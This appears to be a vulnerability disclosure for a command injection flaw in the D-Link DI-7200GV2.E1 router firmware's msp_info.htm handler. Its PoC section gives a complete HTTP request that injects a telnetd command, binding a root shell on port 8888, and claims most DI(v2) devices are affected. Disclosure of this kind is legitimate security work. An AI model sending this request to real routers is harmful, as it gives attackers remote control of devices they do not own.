# D-Link Vulnerability

Vendor:D-Link

Product:DI-7200GV2.E1

Version:21.04.09E1(Download Link:[D-Link Technical Support (dlink.com.cn)](http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DI-7000G+V2系列))

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn



## Vulnerability description

We found an Command Injection vulnerability in D-Link router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `jhttpd` binary:

In `msp_info.htm` function, `cmd` is directly passed by the attacker, If this part of the data is too long, so we can control the `cmd` to attack the OS.

<div  align="center"><img src="./images/1.png" style="zoom:80%;" /></div>

As you can see here, the initial input has not checked and cause command injection.

**Supplement**

According to our observations, almost all D-Link DI(v2) series products will be affected by this vulnerability.



## PoC

We set `cmd` as **`telnetd%20-l%20/bin/sh%20-p%208888%20-b%200.0.0.0`** , and the router will excute it,such as:

```http
GET /msp_info.htm?flag=cmd&iface=&cmd=`telnetd%20-l%20/bin/sh%20-p%208888%20-b%200.0.0.0` HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: userid=admin; gw_userid=admin,gw_passwd=6B426544FD5BACCE66B00364EA3945AF
Upgrade-Insecure-Requests: 1
```

<div  align="center"><img src="./images/2.png" style="zoom:80%;" /></div>



## Result

Get a shell!

<div  align="center"><img src="./images/3.png" style="zoom:80%;" /></div>

